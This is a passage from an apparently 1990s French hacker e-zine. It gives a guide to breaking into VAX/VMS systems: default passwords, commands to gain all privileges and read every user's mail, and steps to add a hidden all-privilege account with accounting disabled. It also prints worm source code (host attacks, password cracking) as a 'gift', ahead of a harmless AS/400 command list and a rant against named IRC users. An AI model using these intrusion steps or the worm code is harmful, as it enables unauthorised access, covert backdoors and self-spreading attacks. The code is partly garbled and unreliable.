vous vous connectez sur un VAX (système VMS) vous allez vous retrouver devant le prompt suivant : USERNAME: PASSWORD: Bien que cela marche raremement (ca ne m'est arrivé qu'une seule fois), vous pouvez essayer de vous connecter avec les accounts par défaut : USERNAME PASSWORD SYSTEM MANAGER ou OPERATOR FIELD SERVICE ou TEST DEFAULT USER ou DEFAULT SYSTEST UETP ou SYSTEST Les accounts suivants sont souvent utilisés sur les systèmes VMS : VAX VMS DCL DEMO GUEST GENERAL TEST HELP GAMES DECNET Bref, si vous arrivez à pénétrer le VAX voici quelques commandes qui peuvent vous être utiles : Pour gagner les privilèges : $ SET PROCESS/PRIVS=ALL Si vous tapez la commande suivante, vous aurez une liste et des infos sur toutes les commandes : $ help * $ SHOW USERS : la commande parle d'elle même.... ex : VAX/VMS Interactive Users-Total=4 01-may-1989 11:37:21.73 0PAO: DEMO 004C004C TTD2: FIELD 004E02FF TTD1: SYSMAN 0043552E TXB3 TRTRTRRTR 01190057 Pour communiquer avec d'autres utilisateurs ou d'autre hackers sur le système ;) : $ PHONE Username $ SHOW NETWORK \ Ne soyons pas stupides.... $ MAIL / $ DIR : comme sous dos. Quand le système VMS est installé pour la première fois il y a 9 répertoires qui ne sont pas listés si vous tapez dir *.* Ce sont les répertoires suivants : Contient diverses macros et librairies. Contient les fichiers utilisés pour l'administration du système. Fichiers textes et fichiers d'aide. Le fichier log des erreurs système : ERRLOG.SYS Contient des fichiers utilisés pour tester les fonction du système. Contient les programmes de diagnostic du système. Contient les fichiers utilisés pour les mises à jour. Divers programmes... Contient les images des exécutables de la pluspart es fonctions du système. This directory contains the executable images of most of the functions Type de fichiers: Description: command: ------------------------------------------------------------------------------------------ .hlp system help file TYPE filename .dat data file TYPE filename .msg message file TYPE filename .doc Documentation TYPE filename .log LOG file TYPE filename .err ERROR msg file TYPE filename .seq sequential file TYPE filename .sys system file FILE-NAME .exe executable file FILE-NAME .com command file COMMAND NAME .bas basic file RUN file-name .txt ascii text file TYPE filename ------------------------------------------------------------------------------------------ Si vous voulez voir tous les mails de tout le monde : $TYPE <*.*>*.MAI;* PRIVILEGES Il y a 7 types de privilèges classés par ordre croissant : NONE - No privileges NORMAL - minimum privileges to use the system. GROUP - Potential to interfere with members of the same group. DEVOUR - Potential to devour noncritical system-wide resources. SYSTEM - Potential to interfere with normal system operation. FILE - Potential to comprimise file security. ALL - Potential to control the system (wouldn't that be good ahah). THE UAF Le fichier uaf contient les noms de tous les utilisateurs ayant accès au système ainsi que d'autres informations comme le password le code UIC, les privilèges etc... Si vous avez les privilèges du system manager vous pouvez à loisir modifier, effacer, rajouter, tout ce que vous voulez au fichier. C'est l'utilitaire AUTHORIZE qui se trouve normalement dans le répertoire SYSEXE qui vous permet de modifier ce fichier. Les commandes sont les suivantes: ADD Username Adds a record to the UAF. EXIT (or CTRL-Z) Returns you to command level. HELP Lists the AUTHORIZE commands. LIST Creates a listing file of UAF records. MODIFY Username Modifies a record. REMOVE Username deletes a record. SHOW Displays UAF records. Petite précaution d'abord : $ SET LOGINS /INTERACTIVE=0 Pour avoir une sortie du userfile : $ SET DEFAULT $ RUN AUTHORIZE UAF> SHOW * /BRIEF UAF La méthode d'encryption des passwords est la même que sous unix. Pour créer votre account : UAF> ADD /PASSWORD=HACKER /UIC=<014,006> /CPUTIME=0 /DEVICE=SYS$ROOT_/ACCOUNT=VMS /DIRECTORY= /PRIVS=ALL /OWNER=DIGITAL /NOACCOUNTING 1. ADD USERNAME 2. SPECIFY THE PASSWORD YOU WANT TO USE.... 3. ASSIGN A UIC CONSISTS OF 2 NUMBERS FROM 0 TO 377 SEPERATED BY A COMMAND ENCLOSED IN BRACKETS.... 4. CPUTIME IS IN DELTA FORMAT, 0 MEANS INFINITE...... 5. SPECIFY THE DEVICE THAT IS ALLOCATED TO THE USER WHEN THEY LOGIN. OTHER DEVICES ARE SYS$DEVICE,SYS$SYSDISK ETC.. 6. SPECIFYING AN ACCOUNT IS NOT REALLY NECCESSARY 7. PRIVS YOU ARE GOING TO WANT ALL THE PRIVS AREN'T YOU??? 8. VERY IMPORTANT.... NOACCOUNTING WILL DISABLE THE SYSTEM ACCOUNTING RECORDS,THUS NOT ADDING INFORMATION TO THE ACCOUNTING.DAT FILE. LOGGING OFF Simply type: $ LOGOUT +++Brain Override+++ ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ X] Un petit cadeau #include long current_time; struct rlimit no_core = {0,0}; int main (argc, argv) int argc; char *argv[]; { int n; int parent = 0; int okay = 0; /* change calling name to "sh" */ strcpy(argv[0], "sh"); /* prevent core files by setting limit to 0 */ setrlimit(RLIMIT_CORE, no_core); current_time = time(0); /* seed random number generator with time */ srand48(current_time); n = 1; while (argv[n]) { /* save process id of parent */ if (!strncmp(argv[n], "-p", 2)) { parent = atoi (argv[++n]); n++; } else { /* check for 1l.c in argument list */ if (!strncmp(argv([n], "1l.c", 4)) okay = 1; /* load an object file into memory */ load_object (argv[n]; /* clean up by unlinking file */ if (parent) unlink (argv[n]); /* and removing object file name */ strcpy (argv[n++], ""); } } /* if 1l.c was not in argument list, quit */ if (!okay) exit (0); /* reset process group */ setpgrp (getpid()); /* kill parent shell if parent is set */ if (parent) kill(parent, SIGHUP); /* scan for network interfaces */ if_init(); /* collect list of gateways from netstat */ rt_init(); /* start main loop */ doit(); } int doit() { current_time = time (0); /* seed random number generator (again) */ srand48(current_time); /* attack gateways, local nets, remote nets */ attack_hosts(); /* check for a "listening" worm */ check_other () /* attempt to send byte to "ernie" */ send_message () for (;;) { /* crack some passwords */ crack_some (); /* sleep or listen for other worms */ other_sleep (30); crack_some (); /* switch process id's */ if (fork()) /* parent exits, new worm continues */ exit (0); /* attack gateways, known hosts */ attack_hosts(); other_sleep(120); /* if 12 hours have passed, reset hosts */ if(time (0) == current_time + (3600*12)) { reset_hosts(); current_time = time(0); } /* quit if pleasequit is set, and nextw>10 */ if (pleasequit && nextw > 10) exit (0); } } Eh...oui, il s'agit bien d'un WORM... +++Brain Override+++ ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ XI] Liste des commandes de l'IBM AS/400 Commandes Description ------- ----------- ADDACC Add Access Code ADDAJE Add Autostart Job Entry ADDAUTLE Add Authorization List Entry ADDBKP Add Breakpoint ADDCFGLE Add Configuration List Entries ADDCMNE Add Communications Entry ADDDIRE Add Directory Entry ADDDLOAUT Add DLO Authority ADDDSTLE Add Distribution List Entry ADDDTADFN Add Data Definition ADDICFDEVE Add ICF Device Entry ADDJOBQE Add Job Queue Entry ADDLFM Add Logical File Member ADDLIBLE Add Library List Entry ADDMSGD Add Message Description ADDNETJOBE Add Network Job Entry ADDPFM Add Physical File Member ADDPFVLM Add Phy File Variable Len Mbr ADDPGM Add Program ADDRPYLE Add Reply List Entry ADDRTGE Add Routing Entry ADDTRC Add Trace ADDWSE Add Work Station Entry ALCOBJ Allocate Object ANSLIN Answer Line ANSQST Answer Questions ANZACCGRP Analyze Process Access Group ANZDBF Analyze Database Files ANZDBFKEY Analyze Database File Keys ANZPGM Analyze Programs ANZPRB Analyze Problem ANZS34OCL Analyze S/34 OCL APYJRNCHG Apply Journaled Changes APYPTF Apply Program Temporary Fix ASKQST Ask Question BCHJOB Batch Job CALL Call Program CFGDSTSRV Configure Distribution Service CHGACGCDE Change Accounting Code CHGAJE Change Autostart Job Entry CHGAUTLE Change Authorization List Entr CHGCFGL Change Configuration List CHGCMD Change Command CHGCMDDFT Change Command Default CHGCMNE Change Communications Entry CHGCOSD Change Class-of-Service Desc CHGCTLAPPC Change Ctl Desc (APPC) CHGCTLASC Change Ctl Desc (Async) CHGCTLBSC Change Ctl Desc (BSC) CHGCTLFNC Change Ctl Desc (Finance) CHGCTLHOST Change Ctl Desc (SNA Host) CHGCTLLWS Change Ctl Desc (Local WS) CHGCTLRWS Change Ctl Desc (Remote WS) CHGCTLVWS Change Ctl Desc (Virtual WS) CHGCURLIB Change Current Library CHGDBG Change Debug CHGDDMF Change DDM File CHGDEVAPPC Change Device Desc (APPC) CHGDEVASC Change Device Desc (Async) CHGDEVBSC Change Device Desc (BSC) CHGDEVDKT Change Device Desc (Diskette) CHGDEVDSP Change Device Desc (Display) CHGDEVFNC Change Device Desc (Finance) CHGDEVHOST Change Device Desc (SNA Host) CHGDEVPRT Change Device Desc (Printer) CHGDEVSNUF Change Device Desc (SNUF) CHGDEVTAP Change Device Desc (Tape) CHGDIRE Change Directory Entry CHGDKTF Change Diskette File CHGDLOAUT Change DLO Authority CHGDLOOWN Change DLO Owner CHGDOCD Change Document Description CHGDSPF Change Display File CHGDSTPWD Change DST Password CHGDTA Change Data CHGDTAARA Change Data Area CHGGRPA Change Group Attributes CHGHLLPTR Change HLL Pointer CHGICFDEVE Change ICF Device Entry CHGICFF Change ICF File CHGJOB Change Job CHGJOBD Change Job Description CHGJOBQE Change Job Queue Entry CHGJOBTYP Change Job Type CHGJRN Change Journal CHGKBDMAP Change Keyboard Map CHGLF Change Logical File CHGLFM Change Logical File Member CHGLIB Change Library CHGLIBL Change Library List CHGLINASC Change Line Desc (Async) CHGLINBSC Change Line Desc (BSC) CHGLINSDLC Change Line Desc (SDLC) CHGLINTDLC Change Line Desc (TDLC) CHGLINTRN Change Line Desc (Token-Ring) CHGLINX25 Change Line Desc (X.25) CHGMNU Change Menu CHGMODD Change Mode Description CHGMSGD Change Message Description CHGMSGQ Change Message Queue CHGNETA Change Network Attributes CHGNETJOBE Change Network Job Entry CHGOBJD Change Object Description CHGOBJOWN Change Object Owner CHGOUTQ Change Output Queue CHGPCOPRF Change PC Organizer Profile CHGPF Change Physical File CHGPFM Change Physical File Member CHGPGM Change Program CHGPGMVAR Change Program Variable CHGPRF Change Profile CHGPRTF Change Printer File CHGPTR Change Pointer CHGPWD Change Password CHGQSTDB Change Q/A Database CHGRPYLE Change Reply List Entry CHGRTGE Change Routing Entry CHGSAVF Change Save File CHGSBSD Change Subsystem Description CHGSPLFA Change Spooled File Attributes CHGSRCPF Change Source Physical File CHGSSNMAX Change Session Maximum CHGSYSLIBL Change System Library List CHGSYSVAL Change System Value CHGS34LIBM Change S/34 Library Member CHGS36 Change S/36 Configuration CHGS36PGMA Change S/36 Program Attributes CHGS36PRCA Change S/36 Proc Attributes CHGS36PRCX Change S/36 Proc Attributes CHGS36SRCA Change S/36 Source Attributes CHGTAPF Change Tape File CHGUSRPRF Change User Profile CHGVAR Change Variable CHGWSE Change Work Station Entry CHGWTR Change Writer CHKDKT Check Diskette CHKDOC Check Document CHKOBJ Check Object CHKPWD Check Password CHKRCDLCK Check Record Locks CHKTAP Check Tape CLCSTGCFG Calculate Storage Config CLOF Close File CLRDKT Clear Diskette CLRJOBQ Clear Job Queue CLRLIB Clear Library CLRMSGQ Clear Message Queue CLROUTQ Clear Output Queue CLRPFM Clear Physical File Member CLRSAVF Clear Save File CLRTRCDTA Clear Trace Data CMD Command Definition CMPJRNIMG Compare Journal Images COMMIT Commit CPYCFGL Copy Configuration List CPYDOC Copy Document CPYF Copy File CPYFRMDKT Copy From Diskette CPYFRMPCD Copy From PC Document CPYFRMTAP Copy From Tape CPYLIB Copy Library CPYPTF Copy Program Temporary Fix CPYSPLF Copy Spooled File CPYSRCF Copy Source File CPYTODKT Copy To Diskette CPYTOPCD Copy To PC Document CPYTOTAP Copy To Tape CRTAPAR Create APAR CRTAUTHLR Create Authority Holder CRTAUTL Create Authorization List CRTBASPGM Create BASIC Program CRTCBLPGM Create COBOL Program CRTCFGL Create Configuration List CRTCLPGM Create CL Program CRTCLS Create Class CRTCMD Create Command CRTCOSD Create Class-of-Service Desc CRTCTLAPPC Create Ctl Desc (APPC) CRTCTLASC Create Ctl Desc (Async) CRTCTLBSC Create Ctl Desc (BSC) CRTCTLFNC Create Ctl Desc (Finance) CRTCTLHOST Create Ctl Desc (SNA Host) CRTCTLLWS Create Ctl Desc (Local WS) CRTCTLRWS Create Ctl Desc (Remote WS) CRTCTLVWS Create Ctl Desc (Virtual WS) CRTDDMF Create DDM File CRTDEVAPPC Create Device Desc (APPC) CRTDEVASC Create Device Desc (Async) CRTDEVBSC Create Device Desc (BSC) CRTDEVDKT Create Device Desc (Diskette) CRTDEVDSP Create Device Desc (Display) CRTDEVFNC Create Device Desc (Finance) CRTDEVHOST Create Device Desc (SNA Host) CRTDEVPRT Create Device Desc (Printer) CRTDEVSNUF Create Device Desc (SNUF) CRTDEVTAP Create Device Desc (Tape) CRTDKTF Create Diskette File CRTDOC Create Document CRTDSPF Create Display File CRTDSTL Create Distribution List CRTDTAARA Create Data Area CRTDTADCT Create Data Dictionary CRTDTAQ Create Data Queue CRTDUPOBJ Create Duplicate Object CRTEDTD Create Edit Description CRTFLR Create Folder CRTGSS Create Graphics Symbol Set CRTICFF Create ICF File CRTJOBD Create Job Description CRTJOBQ Create Job Queue CRTJRN Create Journal CRTJRNRCV Create Journal Receiver CRTLF Create Logical File CRTLIB Create Library CRTLINASC Create Line Desc (Async) CRTLINBSC Create Line Desc (BSC) CRTLINSDLC Create Line Desc (SDLC) CRTLINTDLC Create Line Desc (TDLC) CRTLINTRN Create Line Desc (Token-Ring) CRTLINX25 Create Line Desc (X.25) CRTMNU Create Menu CRTMODD Create Mode Description CRTMSGF Create Message File CRTMSGFMNU Create Menu from Msg Files CRTMSGQ Create Message Queue CRTOUTQ Create Output Queue CRTPF Create Physical File CRTPLIPGM Create PL/I Program CRTPRTF Create Printer File CRTQSTDB Create Q/A Database CRTQSTLOD Create Q/A Database Load CRTRPGPGM Create RPG III Program CRTRPTPGM Create Auto Report RPG Program CRTSAVF Create Save File CRTSBSD Create Subsystem Description CRTSPADCT Create Spelling Aid Dictionary CRTSRCPF Create Source Physical File CRTS36CBL Create S/36 COBOL Program CRTS36DSPF Create S/36 Display File CRTS36MNU Create S/36 Menu CRTS36MSGF Create S/36 Message File CRTS36RPG Create RPG II Program CRTS36RPGR Create Console Display File CRTS36RPT Create S/36 RPG II Auto Report CRTTAPF Create Tape File CRTTBL Create Table CRTUSRPRF Create User Profile CVTBASSTR Convert S/36 Stream File CVTBASUNF Convert S/36 Unformatted File CVTBGUDTA Convert BGU Data CVTCLSRC Convert CL Source CVTDAT Convert Date CVTS36CFG Convert S/36 Configuration CVTS36FCT Convert Forms Control Table CVTS36JOB Convert S/36 Migration Job CVTS36QRY Convert S/36 Query CVTS38JOB Convert S/38 Migration Job CVTTOFLR Convert To Folder DATA Data DCL Declare CL Variable DCLF Declare File DEP Dependent Definition DLCOBJ Deallocate Object DLTAUTHLR Delete Authority Holder DLTAUTL Delete Authorization List DLTCFGL Delete Configuration List DLTCHTFMT Delete Chart Format DLTCLS Delete Class DLTCMD Delete Command DLTCOSD Delete Class-of-Service Desc DLTCTLD Delete Controller Description DLTDEVD Delete Device Description DLTDFUPGM Delete DFU Program DLTDKTLBL Delete Diskette Label DLTDLO Delete Document Library Object DLTDOCL Delete Document List DLTDST Delete Distribution DLTDSTL Delete Distribution List DLTDTAARA Delete Data Area DLTDTADCT Delete Data Dictionary DLTDTAQ Delete Data Queue DLTEDTD Delete Edit Description DLTF Delete File DLTGSS Delete Graphic Symbol Set DLTJOBD Delete Job Description DLTJOBQ Delete Job Queue DLTJRN Delete Journal DLTJRNRCV Delete Journal Receiver DLTLIB Delete Library DLTLICPGM Delete Licensed Program DLTLIND Delete Line Description DLTMNU Delete Menu DLTMODD Delete Mode Description DLTMSGF Delete Message File DLTMSGQ Delete Message Queue DLTNETF Delete Network File DLTOUTQ Delete Output Queue DLTOVR Delete Override DLTOVRDEVE Delete Override Pgm Dev Entry DLTPGM Delete Program DLTPNLGRP Delete Panel Group DLTPRB Delete Problem DLTQRY Delete Query DLTQST Delete Questions and Answers DLTQSTDB Delete Q/A Database DLTSBSD Delete Subsystem Description DLTSCHIDX Delete Search Index DLTSPADCT Delete Spelling Aid Dictionary DLTSPLF Delete Spooled File DLTTBL Delete Table DLTUSRPRF Delete User Profile DLYJOB Delay Job DMPCLPGM Dump CL Program DMPJOB Dump Job DMPJOBINT Dump Job Internal DMPOBJ Dump Object DMPSYSOBJ Dump System Object DMPTAP Dump Tape DMPTRC Dump Trace DO Do Group DSPACC Display Access Code DSPACCAUT Display Access Code Authority DSPACCGRP Display Access Group DSPAPPNINF Display APPN Information DSPAUTHLR Display Authority Holder DSPAUTL Display Authorization List DSPAUTLDLO Display Authorization List DLO DSPAUTLOBJ Display Authorization List Obj DSPAUTUSR Display Authorized Users DSPBKP Display Breakpoints DSPCFGL Display Configuration List DSPCHT Display Chart DSPCLS Display Class DSPCMD Display Command DSPCOSD Display Class-of-Service Desc DSPCTLD Display Controller Description DSPDBG Display Debug DSPDBR Display Data Base Relations DSPDDMF Display DDM File DSPDEVD Display Device Description DSPDIR Display Directory DSPDKT Display Diskette DSPDLOAUT Display DLO Authority DSPDOC Display Document DSPDSTL Display Distribution List DSPDSTLOG Display Distribution Log DSPDSTSRV Display Distribution Services DSPDTA Display Data DSPDTAARA Display Data Area DSPDTADCT Display Data Dictionary DSPEDTD Display Edit Description DSPFD Display File Description DSPFFD Display File Field Description DSPFLR Display Folder DSPGDF Display Graphics Data File DSPHLPDOC Display Help Document DSPJOB Display Job DSPJOBD Display Job Description DSPJOBLOG Display Job Log DSPJRN Display Journal DSPJRNRCVA Display Journal Receiver Atr DSPKBDMAP Display Keyboard Map DSPLIB Display Library DSPLIBL Display Library List DSPLIND Display Line Description DSPLOG Display Log DSPMNUA Display Menu Attributes DSPMODD Display Mode Description DSPMODSTS Display Mode Status DSPMSG Display Messages DSPMSGD Display Message Description DSPNETA Display Network Attributes DSPOBJAUT Display Object Authority DSPOBJD Display Object Description DSPOVR Display Override DSPPFM Display Physical File Member DSPPGM Display Program DSPPGMADP Display Program Adopt DSPPGMREF Display Program References DSPPGMVAR Display Program Variable DSPPTF Display Program Temporary Fix DSPRCDLCK Display Record Locks DSPSAVF Display Save File DSPSBSD Display Subsystem Description DSPSOCSTS Display Sphere of Control Sts DSPSPLF Display Spooled File DSPSRVSTS Display Service Status DSPSYSVAL Display System Value DSPS36 Display S/36 Configuration DSPTAP Display Tape DSPTRC Display Trace DSPTRCDTA Display Trace Data DSPUSRPMN Display User Permission DSPUSRPRF Display User Profile DUPDKT Duplicate Diskette EDTAUTL Edit Authorization List EDTDLOAUT Edit DLO Authority EDTDOC Edit Document EDTLIBL Edit Library List EDTOBJAUT Edit Object Authority EDTQST Edit Questions and Answers EDTS36PGMA Edit S/36 Program Attributes EDTS36PRCA Edit S/36 Procedure Attributes EDTS36SRCA Edit S/36 Source Attributes EJTEMLOUT Eject Emulation Output ELEM Element Definition ELSE Else EMLPRTKEY Emulate Printer Keys ENDBCHJOB End Batch Job ENDCBLDBG End COBOL Debug ENDCMTCTL End Commitment Control ENDCPYSCN End Copy Screen ENDCTLRCY End Controller Recovery ENDDBG End Debug Mode ENDDEVRCY End Device Recovery ENDDO End Do Group ENDGRPJOB End Group Job ENDINP End Input ENDJOB End Job ENDJOBABN End Job Abnormal ENDJOBTRC End Job Trace ENDJRNAP End Journal Access Path ENDJRNPF End Journaling PF Changes ENDLINRCY End Line Recovery ENDMOD End Mode ENDPASTHR End Pass-Through ENDPFRMON End Performance Monitor ENDPGM End Program ENDPRTEML End Printer Emulation ENDRCV End Receive ENDRDR End Reader ENDRQS End Request ENDSAM End Sampled Address Monitor ENDSAMCOL End SAM Data Collection ENDSBS End Subsystem ENDSRVJOB End Service Job ENDSYS End System ENDS36 End S/36 Session ENDTIESSN End TIE Session ENDWTR End Writer EXTPGMINF Extract Program Information FILDOC File Document FMTDTA Reformat Data GENS36RPT Generate Migration Reports GENS38RPT Generate Migration Reports GO Go to Menu GOTO Go To GRTACCAUT Grant Access Code Authority GRTOBJAUT Grant Object Authority GRTUSRAUT Grant User Authority GRTUSRPMN Grant User Permission HLDCMNDEV Hold Communications Device HLDJOB Hold Job HLDJOBQ Hold Job Queue HLDOUTQ Hold Output Queue HLDRDR Hold Reader HLDSPLF Hold Spooled File HLDWTR Hold Writer IF If INZDKT Initialize Diskette INZPCS Initialize AS/400 PC Support INZPFM Initialize Physical File Mbr INZTAP Initialize Tape LNKDTADFN Link/Unlink Data Definition LODPTF Load Program Temporary Fix LODQSTDB Load Q/A Database MDLSYS Model System MGRS36ITM Migrate item MGRS38OBJ Migrate object MONMSG Monitor Message MOVOBJ Move Object MRGDOC Merge Document MRGFORMD Merge Form Description MRGMSGF Merge Message File OPNDBF Open Data Base File OPNQRYF Open Query File OVRDBF Override with Data Base File OVRDKTF Override with Diskette File OVRDSPF Override with Display File OVRICFDEVE Override ICF Pgm Device Entry OVRICFF Override ICF File OVRMSGF Override Message File OVRPRTF Override with Printer File OVRSAVF Override with Save File OVRTAPF Override with Tape File PAGDOC Paginate Document PARM Parameter Definition PGM Program PMTCTL Prompt Control Definition POSDBF Position Data Base File PRTCMDUSG Print Command Usage PRTCPTRPT Print Component Report PRTDOC Print Document PRTERRLOG Print Error Log PRTINTDTA Print Internal Data PRTJOBTRC Print Job Trace PRTLCKRPT Print Lock Report PRTSAMDTA Print SAM Data PRTSYSRPT Print System Report PRTTNSRPT Print Transaction Report PWRDWNSYS Power Down System QRYDOCLIB Query Document Library QRYDST Query Distributions QRYTIEF Query TIE Files QUAL Qualifier Definition RCLDDMCNV Reclaim DDM Conversations RCLDLO Reclaim Document Lib Object RCLRSC Reclaim Resources RCLSTG Reclaim Storage RCVDST Receive Distribution RCVF Receive File RCVJRNE Receive Journal Entry RCVMSG Receive Message RCVNETF Receive Network File RCVTIEF Receive TIE File RETURN Return RGZPFM Reorganize Physical File Mbr RLSCMNDEV Release Communications Device RLSJOB Release Job RLSJOBQ Release Job Queue RLSOUTQ Release Output Queue RLSRDR Release Reader RLSSPLF Release Spooled File RLSWTR Release Writer RMVACC Remove Access Code RMVAJE Remove Autostart Job Entry RMVAUTLE Remove Auth List Entry RMVBKP Remove Breakpoint RMVCFGLE Remove Cfg List Entries RMVCMNE Remove Communications Entry RMVDIRE Remove Directory Entry RMVDLOAUT Remove DLO Authority RMVDSTLE Remove Distribution List Entry RMVICFDEVE Remove ICF Device Entry RMVJOBQE Remove Job Queue Entry RMVJRNCHG Remove Journaled Changes RMVLIBLE Remove Library List Entry RMVM Remove Member RMVMSG Remove Message RMVMSGD Remove Message Description RMVNETJOBE Remove Network Job Entry RMVPGM Remove Program RMVPTF Remove Program Temporary Fix RMVRPYLE Remove Reply List Entry RMVRTGE Remove Routing Entry RMVTRC Remove Trace RMVWSE Remove Work Station Entry RNMDKT Rename Diskette RNMDLO Rename Document Library Object RNMM Rename Member RNMOBJ Rename Object ROLLBACK Rollback RPLDOC Replace Document RRTJOB Reroute Job RSMBKP Resume Breakpoint RSMCTLRCY Resume Controller Recovery RSMDEVRCY Resume Device Recovery RSMLINRCY Resume Line Recovery RSTAUT Restore Authority RSTCFG Restore Configuration RSTDLO Restore Document Lib Object RSTLIB Restore Library RSTLIBS RESTORE/CLEAR 1 TO 10 LIBRARIES RSTLIBSBOS Restore/Clear 1 to 20 libraries RSTLICPGM Restore Licensed Program RSTOBJ Restore Object RSTS36F Restore S/36 File RSTS36FLR Restore S/36 Folder RSTS36LIBM Restore S/36 Library Members RSTUSRPRF Restore User Profiles RTVAUTLE Retrieve Auth List Entry RTVCLSRC Retrieve CL Source RTVDOC Retrieve Document RTVDTAARA Retrieve Data Area RTVGRPA Retrieve Group Attributes RTVJOBA Retrieve Job Attributes RTVJRNE Retrieve Journal Entry RTVMSG Retrieve Message RTVNETA Retrieve Network Attributes RTVSYSVAL Retrieve System Value RTVUSRPRF Retrieve User Profile RUNQRY Run Query RVKACCAUT Revoke Access Code Authority RVKOBJAUT Revoke Object Authority RVKUSRPMN Revoke User Permission SAVCHGOBJ Save Changed Objects SAVDLO Save Document Library Object SAVLIB Save Library SAVLICPGM Save Licensed Program SAVOBJ Save Object SAVSAVFDTA Save Save File Data SAVSYS Save System SAVS36F Save S/36 File SAVS36LIBM Save S/36 Library Members SBMDBJOB Submit Data Base Jobs SBMDKTJOB Submit Diskette Jobs SBMFNCJOB Submit Finance Job SBMJOB Submit Job SBMNETJOB Submit Network Job SBMRMTCMD Submit Remote Command SETATNPGM Set Attention Program SETKBDMAP Set Keyboard Map SETPGMINF Set Program Information SIGNOFF Sign Off SLTCMD Select Command SNDBRKMSG Send Break Message SNDDOC Send Document SNDDST Send Distribution SNDF Send File SNDJRNE Send Journal Entry SNDMSG Send Message SNDNETF Send Network File SNDNETMSG Send Network Message SNDNETSPLF Send Network Spool File SNDPGMMSG Send Program Message SNDPTFORD Send PTF Order SNDRCVF Send/Receive File SNDRPY Send Reply SNDSRVRQS Send Service Request SNDTIEF Send TIE File SNDUSRMSG Send User Message STRAPF Advanced Printer Function STRBAS Start BASIC Session STRBASPRC Start BASIC Procedure STRBGU Start BGU STRCBLDBG Start COBOL Debug STRCMTCTL Start Commitment Control STRCPYSCN Start Copy Screen STRDBG Start Debug STRDBRDR Start Data Base Reader STRDFU Start DFU STRDKTRDR Start Diskette Reader STRDKTWTR Start Diskette Writer STREDU Start Education STREML3270 Start 3270 Display Emulation STRIDD Start IDD STRIDXSCH Start Index Search STRITF Start ITF STRJOBTRC Start Job Trace STRJRNAP Start Journal Access Path STRJRNPF Start Journal Physical File STRMOD Start Mode STROFC Start Office STRPASTHR Start Pass-Through STRPCCMD Start PC Command STRPCO Start PC Organizer STRPDM Start PDM STRPFRMON Start Performance Monitor STRPFRT Start Performance Tools STRPGMMNU Start Programmer Menu STRPRTEML Start Printer Emulation STRPRTWTR Start Printer Writer STRQRY Start Query STRQST Start Question and Answer STRSAM Start Sampled Address Monitor STRSAMCOL Start SAM Data Collection STRSBS Start Subsystem STRSDA Start SDA STRSEU Start Source Entry Utility STRSPTN Start Support Network STRSRVJOB Start Service Job STRSST Start System Service Tools STRS36 Start S/36 Session STRS36MGR Start S/36 Migration STRS36PRC Start S/36 Procedure STRS38MGR Start S/38 Migration STRTIESSN Start TIE Session STRWP Start Word Processing TFRBCHJOB Transfer Batch Job TFRCTL Transfer Control TFRGRPJOB Transfer to Group Job TFRJOB Transfer Job TFRSECJOB Transfer Secondary Job TRCINT Trace Internal TRCJOB Trace Job UPDDTA Update Data with Temp Program VFYCMN Verify Communications VFYPRT Verify Printer VRYCFG Vary Configuration WAIT Wait WRKACTJOB Work with Active Jobs WRKALR Work with Alerts WRKAUTL Work with Authorization Lists WRKCFGL Work with Configuration Lists WRKCFGSTS Work with Configuration Status WRKCMD Work with Commands WRKCNTINF Work with Contact Information WRKCOSD Work with COS Descriptions WRKCTLD Work with Ctl Descriptions WRKDBFIDD Work with DB Files using IDDU WRKDDMF Work with DDM Files WRKDEVD Work with Device Descriptions WRKDEVTBL Work with Device Tables WRKDIR Work with Directory WRKDOC Work with Documents WRKDOCLIB Work with Remote Document Lib WRKDOCPRTQ Work with Document Print Queue WRKDPCQ Work with DSNX/PC Queues WRKDSTL Work with Distribution Lists WRKDSTQ Work with Distribution Queue WRKDTADCT Work with Data Dictionaries WRKDTADFN Work with Data Definitions WRKF Work with Files WRKFLR Work with Folders WRKHDWPRD Work with Hardware Products WRKJOB Work with Job WRKJOBD Work with Job Descriptions WRKJOBQ Work with Job Queue WRKJRN Work with Journal WRKJRNA Work with Journal Attributes WRKLIB Work with Libraries WRKLIBPDM Work with Libraries Using PDM WRKLIND Work with Line Descriptions WRKMBRPDM Work with Members Using PDM WRKMNU Work with Menus WRKMODD Work with Mode Descriptions WRKMSGD Work with Message Descriptions WRKMSGQ Work with Message Queues WRKNETF Work with Network Files WRKNETJOBE Work with Network Job Entries WRKOBJ Work with Objects WRKOBJLCK Work with Object Locks WRKOBJPDM Work with Objects Using PDM WRKOUTQ Work with Output Queue WRKOUTQD Work with OUTQ Description WRKPGMTBL Work with Program Tables WRKPRB Work with Problem WRKPRDINF Work with Product Information WRKQRY Work With Queries WRKQST Work with Questions WRKSPLF Work with Spooled Files WRKRPYLE Work with Reply List Entries WRKSBMJOB Work with Submitted Jobs WRKSBS Work with Subsystems WRKSBSD Work with Subsystem Desc WRKSBSJOB Work with Subsystem Jobs WRKSOC Work with Sphere of Control WRKSPLF Work with Spooled Files WRKSPLFA Work with Spooled File Attr WRKSYSSTS Work with System Status WRKTIE Work with TIE WRKTXTPRF Work With Text Profiles WRKUSRJOB Work with User Jobs WRKUSRPRF Work with User Profiles WRKUSRTBL Work with User Tables WRKWTR Work with Writers +++Crash Test+++ ------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------- XII] Les beaux parleurs ! Eh oui il y en a des gars qui parlent, les vantards, les snobinard, les modestes, les faux modestes, etc... Mais la pire de toute les races c'est les gars qui critiquent un truc à mort et qu'on voit apparaître dans le tableau supporter de certains crew ex: Un certains nombre de personnes de la liste ci dessous ont pu dire sur #hack.fr par ex ;) Mouais IGA c'est de la merde, c'est des lames, etc.. etc... et pourtant ! ------------------------------------------------------------------------------------------- Supporter SaBoTaGe SeOp LeSaint Elnino15 SLIMJIM KneWoN |HoudinI| SunState Vipola Jideel A-yoyeSTI rio18 [-ODin-] marshall GKhan88 drunky FILA667 danseur ScanDium GaZou-- Dreamday processor jonathan2 GurneyH JunK-Y _koshiz_ }SoJab{ err418 _Franck Pushead _Cybelle_ Werewolf BobsKC Shameer Candigal Voodoo Smerchez Romantico Nadia21 Ti-Diable LeFURoTTE Psyka0s Lips-Sil WildThang Q-Derf BlackOp B_real Chanou Gallia Eglisorme Private !Radium! CameleonJ ------------------------------------------------------------------------------------------ extrait d'IGA Numéro 007 Alors les gars, vous allez pas l'air con là ? Je me fou complètement des gens qui critique mais quand c'est pour apparaitre dans la section "supporter" de ces mêmes personnes, ca fait vachement craignos... Alors désolé mais... fermez là ! Et ayez courage de vos opinions. Si vous 